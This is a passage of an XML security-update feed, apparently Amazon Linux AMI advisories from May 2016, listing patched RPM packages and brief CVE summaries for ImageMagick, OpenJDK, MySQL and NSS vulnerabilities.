version="5.6.21" release="1.124.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mssql-5.6.21-1.124.amzn1.x86_64.rpm</filename></package><package name="php56-imap" version="5.6.21" release="1.124.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-imap-5.6.21-1.124.amzn1.x86_64.rpm</filename></package><package name="php56-pspell" version="5.6.21" release="1.124.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pspell-5.6.21-1.124.amzn1.x86_64.rpm</filename></package><package name="php56-mbstring" version="5.6.21" release="1.124.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mbstring-5.6.21-1.124.amzn1.x86_64.rpm</filename></package><package name="php56-pdo" version="5.6.21" release="1.124.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pdo-5.6.21-1.124.amzn1.x86_64.rpm</filename></package><package name="php56-pgsql" version="5.6.21" release="1.124.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pgsql-5.6.21-1.124.amzn1.x86_64.rpm</filename></package><package name="php56-dbg" version="5.6.21" release="1.124.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dbg-5.6.21-1.124.amzn1.x86_64.rpm</filename></package><package name="php56-cli" version="5.6.21" release="1.124.amzn1" epoch="0" arch="i686"><filename>Packages/php56-cli-5.6.21-1.124.amzn1.i686.rpm</filename></package><package name="php56-embedded" version="5.6.21" release="1.124.amzn1" epoch="0" arch="i686"><filename>Packages/php56-embedded-5.6.21-1.124.amzn1.i686.rpm</filename></package><package name="php56-ldap" version="5.6.21" release="1.124.amzn1" epoch="0" arch="i686"><filename>Packages/php56-ldap-5.6.21-1.124.amzn1.i686.rpm</filename></package><package name="php56-common" version="5.6.21" release="1.124.amzn1" epoch="0" arch="i686"><filename>Packages/php56-common-5.6.21-1.124.amzn1.i686.rpm</filename></package><package name="php56-intl" version="5.6.21" release="1.124.amzn1" epoch="0" 
arch="i686"><filename>Packages/php56-intl-5.6.21-1.124.amzn1.i686.rpm</filename></package><package name="php56-mcrypt" version="5.6.21" release="1.124.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mcrypt-5.6.21-1.124.amzn1.i686.rpm</filename></package><package name="php56-mysqlnd" version="5.6.21" release="1.124.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mysqlnd-5.6.21-1.124.amzn1.i686.rpm</filename></package><package name="php56-xml" version="5.6.21" release="1.124.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xml-5.6.21-1.124.amzn1.i686.rpm</filename></package><package name="php56-debuginfo" version="5.6.21" release="1.124.amzn1" epoch="0" arch="i686"><filename>Packages/php56-debuginfo-5.6.21-1.124.amzn1.i686.rpm</filename></package><package name="php56-pgsql" version="5.6.21" release="1.124.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pgsql-5.6.21-1.124.amzn1.i686.rpm</filename></package><package name="php56-fpm" version="5.6.21" release="1.124.amzn1" epoch="0" arch="i686"><filename>Packages/php56-fpm-5.6.21-1.124.amzn1.i686.rpm</filename></package><package name="php56-bcmath" version="5.6.21" release="1.124.amzn1" epoch="0" arch="i686"><filename>Packages/php56-bcmath-5.6.21-1.124.amzn1.i686.rpm</filename></package><package name="php56-xmlrpc" version="5.6.21" release="1.124.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xmlrpc-5.6.21-1.124.amzn1.i686.rpm</filename></package><package name="php56-dba" version="5.6.21" release="1.124.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dba-5.6.21-1.124.amzn1.i686.rpm</filename></package><package name="php56-devel" version="5.6.21" release="1.124.amzn1" epoch="0" arch="i686"><filename>Packages/php56-devel-5.6.21-1.124.amzn1.i686.rpm</filename></package><package name="php56-pdo" version="5.6.21" release="1.124.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pdo-5.6.21-1.124.amzn1.i686.rpm</filename></package><package name="php56-snmp" version="5.6.21" 
release="1.124.amzn1" epoch="0" arch="i686"><filename>Packages/php56-snmp-5.6.21-1.124.amzn1.i686.rpm</filename></package><package name="php56-opcache" version="5.6.21" release="1.124.amzn1" epoch="0" arch="i686"><filename>Packages/php56-opcache-5.6.21-1.124.amzn1.i686.rpm</filename></package><package name="php56-mssql" version="5.6.21" release="1.124.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mssql-5.6.21-1.124.amzn1.i686.rpm</filename></package><package name="php56-recode" version="5.6.21" release="1.124.amzn1" epoch="0" arch="i686"><filename>Packages/php56-recode-5.6.21-1.124.amzn1.i686.rpm</filename></package><package name="php56-odbc" version="5.6.21" release="1.124.amzn1" epoch="0" arch="i686"><filename>Packages/php56-odbc-5.6.21-1.124.amzn1.i686.rpm</filename></package><package name="php56-gmp" version="5.6.21" release="1.124.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gmp-5.6.21-1.124.amzn1.i686.rpm</filename></package><package name="php56-gd" version="5.6.21" release="1.124.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gd-5.6.21-1.124.amzn1.i686.rpm</filename></package><package name="php56-pspell" version="5.6.21" release="1.124.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pspell-5.6.21-1.124.amzn1.i686.rpm</filename></package><package name="php56" version="5.6.21" release="1.124.amzn1" epoch="0" arch="i686"><filename>Packages/php56-5.6.21-1.124.amzn1.i686.rpm</filename></package><package name="php56-soap" version="5.6.21" release="1.124.amzn1" epoch="0" arch="i686"><filename>Packages/php56-soap-5.6.21-1.124.amzn1.i686.rpm</filename></package><package name="php56-mbstring" version="5.6.21" release="1.124.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mbstring-5.6.21-1.124.amzn1.i686.rpm</filename></package><package name="php56-process" version="5.6.21" release="1.124.amzn1" epoch="0" arch="i686"><filename>Packages/php56-process-5.6.21-1.124.amzn1.i686.rpm</filename></package><package name="php56-tidy" 
version="5.6.21" release="1.124.amzn1" epoch="0" arch="i686"><filename>Packages/php56-tidy-5.6.21-1.124.amzn1.i686.rpm</filename></package><package name="php56-imap" version="5.6.21" release="1.124.amzn1" epoch="0" arch="i686"><filename>Packages/php56-imap-5.6.21-1.124.amzn1.i686.rpm</filename></package><package name="php56-dbg" version="5.6.21" release="1.124.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dbg-5.6.21-1.124.amzn1.i686.rpm</filename></package><package name="php56-enchant" version="5.6.21" release="1.124.amzn1" epoch="0" arch="i686"><filename>Packages/php56-enchant-5.6.21-1.124.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-699</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-699: important priority package update for ImageMagick</title><issued date="2016-05-11 11:00:00" /><updated date="2016-05-11 11:00:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-3718:
A server-side request forgery flaw was discovered in the way ImageMagick processed certain images. A remote attacker could exploit this flaw to mislead an application using ImageMagick or an unsuspecting user using the ImageMagick utilities into, for example, performing HTTP(S) requests or opening FTP sessions via specially crafted images.
1332802:
CVE-2016-3718 ImageMagick: SSRF vulnerability
CVE-2016-3717:
It was discovered that certain ImageMagick coders and pseudo-protocols did not properly prevent security sensitive operations when processing specially crafted images. A remote attacker could create a specially crafted image that, when processed by an application using ImageMagick or an unsuspecting user using the ImageMagick utilities, would allow the attacker to disclose the contents of arbitrary files.
1332505:
CVE-2016-3717 ImageMagick: Local file read
CVE-2016-3716:
It was discovered that certain ImageMagick coders and pseudo-protocols did not properly prevent security sensitive operations when processing specially crafted images. A remote attacker could create a specially crafted image that, when processed by an application using ImageMagick or an unsuspecting user using the ImageMagick utilities, would allow the attacker to move arbitrary files.
1332504:
CVE-2016-3716 ImageMagick: File moving
CVE-2016-3715:
It was discovered that certain ImageMagick coders and pseudo-protocols did not properly prevent security sensitive operations when processing specially crafted images. A remote attacker could create a specially crafted image that, when processed by an application using ImageMagick or an unsuspecting user using the ImageMagick utilities, would allow the attacker to delete arbitrary files.
1332500:
CVE-2016-3715 ImageMagick: File deletion
CVE-2016-3714:
It was discovered that ImageMagick did not properly sanitize certain input before passing it to the delegate functionality. A remote attacker could create a specially crafted image that, when processed by an application using ImageMagick or an unsuspecting user using the ImageMagick utilities, would lead to arbitrary execution of shell commands with the privileges of the user running the application.
1332492:
CVE-2016-3714 ImageMagick: Insufficient shell characters filtering
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3714" title="" id="CVE-2016-3714" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3715" title="" id="CVE-2016-3715" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3716" title="" id="CVE-2016-3716" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3717" title="" id="CVE-2016-3717" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3718" title="" id="CVE-2016-3718" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ImageMagick-debuginfo" version="6.7.8.9" release="13.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-debuginfo-6.7.8.9-13.19.amzn1.x86_64.rpm</filename></package><package name="ImageMagick" version="6.7.8.9" release="13.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-6.7.8.9-13.19.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-c++" version="6.7.8.9" release="13.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-c++-6.7.8.9-13.19.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-devel" version="6.7.8.9" release="13.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-devel-6.7.8.9-13.19.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-c++-devel" version="6.7.8.9" release="13.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-c++-devel-6.7.8.9-13.19.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-doc" version="6.7.8.9" release="13.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-doc-6.7.8.9-13.19.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-perl" version="6.7.8.9" release="13.19.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/ImageMagick-perl-6.7.8.9-13.19.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-doc" version="6.7.8.9" release="13.19.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-doc-6.7.8.9-13.19.amzn1.i686.rpm</filename></package><package name="ImageMagick-perl" version="6.7.8.9" release="13.19.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-perl-6.7.8.9-13.19.amzn1.i686.rpm</filename></package><package name="ImageMagick-c++" version="6.7.8.9" release="13.19.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-c++-6.7.8.9-13.19.amzn1.i686.rpm</filename></package><package name="ImageMagick" version="6.7.8.9" release="13.19.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-6.7.8.9-13.19.amzn1.i686.rpm</filename></package><package name="ImageMagick-debuginfo" version="6.7.8.9" release="13.19.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-debuginfo-6.7.8.9-13.19.amzn1.i686.rpm</filename></package><package name="ImageMagick-devel" version="6.7.8.9" release="13.19.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-devel-6.7.8.9-13.19.amzn1.i686.rpm</filename></package><package name="ImageMagick-c++-devel" version="6.7.8.9" release="13.19.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-c++-devel-6.7.8.9-13.19.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-700</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-700: critical priority package update for java-1.6.0-openjdk</title><issued date="2016-05-11 11:00:00" /><updated date="2016-05-11 11:00:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-3427:
It was discovered that the RMI server implementation in the JMX component in OpenJDK did not restrict which classes can be deserialized when deserializing authentication credentials. A remote, unauthenticated attacker able to connect to a JMX port could possibly use this flaw to trigger deserialization flaws.
1328210:
CVE-2016-3427 OpenJDK: unrestricted deserialization of authentication credentials (JMX, 8144430)
CVE-2016-3425:
It was discovered that the JAXP component in OpenJDK failed to properly handle Unicode surrogate pairs used as part of the XML attribute values. Specially crafted XML input could cause a Java application to use an excessive amount of memory when parsed.
1328040:
CVE-2016-3425 OpenJDK: incorrect handling of surrogate pairs in XML attribute values (JAXP, 8143167)
CVE-2016-0695:
It was discovered that the Security component in OpenJDK failed to check the digest algorithm strength when generating DSA signatures. The use of a digest weaker than the key strength could lead to the generation of signatures that were weaker than expected.
1328022:
CVE-2016-0695 OpenJDK: insufficient DSA key parameters checks (Security, 8138593)
CVE-2016-0687:
Unspecified vulnerability in Oracle Java SE 6u113, 7u99, and 8u77 and Java SE Embedded 8u77 allows remote attackers to affect confidentiality, integrity, and availability via vectors related to the Hotspot sub-component.
1327749:
CVE-2016-0687 OpenJDK: insufficient byte type checks (Hotspot, 8132051)
CVE-2016-0686:
Unspecified vulnerability in Oracle Java SE 6u113, 7u99, and 8u77 and Java SE Embedded 8u77 allows remote attackers to affect confidentiality, integrity, and availability via vectors related to Serialization.
1327743:
CVE-2016-0686 OpenJDK: insufficient thread consistency checks in ObjectInputStream (Serialization, 8129952)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0686" title="" id="CVE-2016-0686" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0687" title="" id="CVE-2016-0687" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0695" title="" id="CVE-2016-0695" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3425" title="" id="CVE-2016-3425" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3427" title="" id="CVE-2016-3427" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.6.0-openjdk-src" version="1.6.0.39" release="1.13.11.1.74.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.39-1.13.11.1.74.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.39" release="1.13.11.1.74.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.39-1.13.11.1.74.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-demo" version="1.6.0.39" release="1.13.11.1.74.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.39-1.13.11.1.74.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.39" release="1.13.11.1.74.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.39-1.13.11.1.74.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.39" release="1.13.11.1.74.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.39-1.13.11.1.74.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk" version="1.6.0.39" release="1.13.11.1.74.amzn1" epoch="1" 
arch="x86_64"><filename>Packages/java-1.6.0-openjdk-1.6.0.39-1.13.11.1.74.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.39" release="1.13.11.1.74.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.39-1.13.11.1.74.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.39" release="1.13.11.1.74.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.39-1.13.11.1.74.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-demo" version="1.6.0.39" release="1.13.11.1.74.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.39-1.13.11.1.74.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-src" version="1.6.0.39" release="1.13.11.1.74.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.39-1.13.11.1.74.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk" version="1.6.0.39" release="1.13.11.1.74.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-1.6.0.39-1.13.11.1.74.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.39" release="1.13.11.1.74.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.39-1.13.11.1.74.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-701</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-701: critical priority package update for mysql56</title><issued date="2016-05-18 14:00:00" /><updated date="2016-05-18 14:00:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-2047:
The ssl_verify_server_cert function in sql-common/client.c in MariaDB before 5.5.47, 10.0.x before 10.0.23, and 10.1.x before 10.1.10; Oracle MySQL 5.5.48 and earlier, 5.6.29 and earlier, and 5.7.11 and earlier; and Percona Server do not properly verify that the server hostname matches a domain name in the subject&#039;s Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via a &quot;/CN=&quot; string in a field in a certificate, as demonstrated by &quot;/OU=/CN=bar.com/CN=foo.com.&quot;
1301874:
CVE-2016-2047 mysql: ssl-validate-cert incorrect hostname check
CVE-2016-0705:
A double-free flaw was found in the way OpenSSL parsed certain malformed DSA (Digital Signature Algorithm) private keys. An attacker could create specially crafted DSA private keys that, when processed by an application compiled against OpenSSL, could cause the application to crash.
1310596:
CVE-2016-0705 OpenSSL: Double-free in DSA code
CVE-2016-0666:
Unspecified vulnerability in Oracle MySQL 5.5.48 and earlier, 5.6.29 and earlier, and 5.7.11 and earlier allows local users to affect availability via vectors related to Security: Privileges.
1329270:
CVE-2016-0666 mysql: unspecified vulnerability in subcomponent: Server: Security: Privileges (CPU April 2016)
CVE-2016-0655:
Unspecified vulnerability in Oracle MySQL 5.6.29 and earlier and 5.7.11 and earlier allows local users to affect availability via vectors related to InnoDB.
1329259:
CVE-2016-0655 mysql: unspecified vulnerability in subcomponent: Server: InnoDB (CPU April 2016)
CVE-2016-0648:
Unspecified vulnerability in Oracle MySQL 5.5.48 and earlier, 5.6.29 and earlier, and 5.7.11 and earlier allows local users to affect availability via vectors related to PS.
1329251:
CVE-2016-0648 mysql: unspecified vulnerability in subcomponent: Server: PS (CPU April 2016)
CVE-2016-0647:
Unspecified vulnerability in Oracle MySQL 5.5.48 and earlier, 5.6.29 and earlier, and 5.7.11 and earlier allows local users to affect availability via vectors related to FTS.
1329249:
CVE-2016-0647 mysql: unspecified vulnerability in subcomponent: Server: FTS (CPU April 2016)
CVE-2016-0643:
Unspecified vulnerability in Oracle MySQL 5.5.48 and earlier, 5.6.29 and earlier, and 5.7.11 and earlier allows local users to affect confidentiality via vectors related to DML.
1329245:
CVE-2016-0643 mysql: unspecified vulnerability in subcomponent: Server: DML (CPU April 2016)
CVE-2016-0642:
Unspecified vulnerability in Oracle MySQL 5.5.48 and earlier, 5.6.29 and earlier, and 5.7.11 and earlier allows local users to affect integrity and availability via vectors related to Federated.
1329243:
CVE-2016-0642 mysql: unspecified vulnerability in subcomponent: Server: Federated (CPU April 2016)
CVE-2016-0639:
Unspecified vulnerability in Oracle MySQL 5.6.29 and earlier and 5.7.11 and earlier allows remote attackers to affect confidentiality, integrity, and availability via vectors related to Pluggable Authentication.
1329238:
CVE-2016-0639 mysql: unspecified vulnerability in subcomponent: Server: Pluggable Authentication (CPU April 2016)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0639" title="" id="CVE-2016-0639" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0642" title="" id="CVE-2016-0642" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0643" title="" id="CVE-2016-0643" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0647" title="" id="CVE-2016-0647" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0648" title="" id="CVE-2016-0648" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0655" title="" id="CVE-2016-0655" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0666" title="" id="CVE-2016-0666" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0705" title="" id="CVE-2016-0705" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2047" title="" id="CVE-2016-2047" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql56-libs" version="5.6.30" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-libs-5.6.30-1.15.amzn1.x86_64.rpm</filename></package><package name="mysql56" version="5.6.30" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-5.6.30-1.15.amzn1.x86_64.rpm</filename></package><package name="mysql56-devel" version="5.6.30" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-devel-5.6.30-1.15.amzn1.x86_64.rpm</filename></package><package name="mysql56-embedded" version="5.6.30" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-embedded-5.6.30-1.15.amzn1.x86_64.rpm</filename></package><package name="mysql56-test" version="5.6.30" release="1.15.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/mysql56-test-5.6.30-1.15.amzn1.x86_64.rpm</filename></package><package name="mysql56-embedded-devel" version="5.6.30" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-embedded-devel-5.6.30-1.15.amzn1.x86_64.rpm</filename></package><package name="mysql56-debuginfo" version="5.6.30" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-debuginfo-5.6.30-1.15.amzn1.x86_64.rpm</filename></package><package name="mysql56-bench" version="5.6.30" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-bench-5.6.30-1.15.amzn1.x86_64.rpm</filename></package><package name="mysql56-common" version="5.6.30" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-common-5.6.30-1.15.amzn1.x86_64.rpm</filename></package><package name="mysql56-server" version="5.6.30" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-server-5.6.30-1.15.amzn1.x86_64.rpm</filename></package><package name="mysql56-errmsg" version="5.6.30" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-errmsg-5.6.30-1.15.amzn1.x86_64.rpm</filename></package><package name="mysql56-embedded" version="5.6.30" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-embedded-5.6.30-1.15.amzn1.i686.rpm</filename></package><package name="mysql56-test" version="5.6.30" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-test-5.6.30-1.15.amzn1.i686.rpm</filename></package><package name="mysql56-errmsg" version="5.6.30" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-errmsg-5.6.30-1.15.amzn1.i686.rpm</filename></package><package name="mysql56-devel" version="5.6.30" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-devel-5.6.30-1.15.amzn1.i686.rpm</filename></package><package name="mysql56" version="5.6.30" release="1.15.amzn1" epoch="0" 
arch="i686"><filename>Packages/mysql56-5.6.30-1.15.amzn1.i686.rpm</filename></package><package name="mysql56-server" version="5.6.30" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-server-5.6.30-1.15.amzn1.i686.rpm</filename></package><package name="mysql56-debuginfo" version="5.6.30" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-debuginfo-5.6.30-1.15.amzn1.i686.rpm</filename></package><package name="mysql56-libs" version="5.6.30" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-libs-5.6.30-1.15.amzn1.i686.rpm</filename></package><package name="mysql56-common" version="5.6.30" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-common-5.6.30-1.15.amzn1.i686.rpm</filename></package><package name="mysql56-embedded-devel" version="5.6.30" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-embedded-devel-5.6.30-1.15.amzn1.i686.rpm</filename></package><package name="mysql56-bench" version="5.6.30" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-bench-5.6.30-1.15.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-702</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-702: medium priority package update for nspr nss-util nss nss-softokn</title><issued date="2016-05-18 14:00:00" /><updated date="2016-05-18 14:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-1979:
A use-after-free flaw was found in the way NSS processed certain DER (Distinguished Encoding Rules) encoded cryptographic keys. An attacker could use this flaw to create a specially crafted DER encoded certificate which, when parsed by an application compiled against the NSS library, could cause that application to crash, or execute arbitrary code using the permissions of the user running the application.
1315202:
CVE-2016-1979 nss: Use-after-free during processing of DER encoded keys in NSS (MFSA 2016-36)
CVE-2016-1978:
A use-after-free flaw was found in the way NSS handled DHE (Diffie-Hellman key exchange) and ECDHE (Elliptic Curve Diffie-Hellman key exchange) handshake messages. A remote attacker could send a specially crafted handshake message that, when parsed by an application linked against NSS, would cause that application to crash or, under certain special conditions, execute arbitrary code using the permissions of the user running the application.
1315565:
CVE-2016-1978 nss: Use-after-free in NSS during SSL connections in low memory (MFSA 2016-15)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1978" title="" id="CVE-2016-1978" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1979" title="" id="CVE-2016-1979" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nspr-debuginfo" version="4.11.0" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/nspr-debuginfo-4.11.0-1.37.amzn1.x86_64.rpm</filename></package><package name="nspr" version="4.11.0" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/nspr-4.11.0-1.37.amzn1.x86_64.rpm</filename></package><package name="nspr-devel" version="4.11.0" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/nspr-devel-4.11.0-1.37.amzn1.x86_64.rpm</filename></package><package name="nspr-devel" version="4.11.0" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/nspr-devel-4.11.0-1.37.amzn1.i686.rpm</filename></package><package name="nspr" version="4.11.0" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/nspr-4.11.0-1.37.amzn1.i686.rpm</filename></package><package name="nspr-debuginfo" version="4.11.0" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/nspr-debuginfo-4.11.0-1.37.amzn1.i686.rpm</filename></package><package name="nss-util-debuginfo" version="3.21.0" release="2.2.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-util-debuginfo-3.21.0-2.2.50.amzn1.x86_64.rpm</filename></package><package name="nss-util" version="3.21.0" release="2.2.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-util-3.21.0-2.2.50.amzn1.x86_64.rpm</filename></package><package name="nss-util-devel" version="3.21.0" release="2.2.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-util-devel-3.21.0-2.2.50.amzn1.x86_64.rpm</filename></package><package name="nss-util-devel" version="3.21.0" release="2.2.50.amzn1" epoch="0" 
arch="i686"><filename>Packages/nss-util-devel-3.21.0-2.2.50.amzn1.i686.rpm</filename></package><package name="nss-util-debuginfo" version="3.21.0" release="2.2.50.amzn1" epoch="0" arch="i686"><filename>Packages/nss-util-debuginfo-3.21.0-2.2.50.amzn1.i686.rpm</filename></package><package name="nss-util" version="3.21.0" release="2.2.50.amzn1" epoch="0" arch="i686"><filename>Packages/nss-util-3.21.0-2.2.50.amzn1.i686.rpm</filename></package><package name="nss-softokn-freebl" version="3.16.2.3" release="14.2.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-softokn-freebl-3.16.2.3-14.2.38.amzn1.x86_64.rpm</filename></package><package name="nss-softokn" version="3.16.2.3" release="14.2.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-softokn-3.16.2.3-14.2.38.amzn1.x86_64.rpm</filename></package><package name="nss-softokn-debuginfo" version="3.16.2.3" release="14.2.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-softokn-debuginfo-3.16.2.3-14.2.38.amzn1.x86_64.rpm</filename></package><package name="nss-softokn-freebl-devel" version="3.16.2.3" release="14.2.38.amzn1" epoch="0" 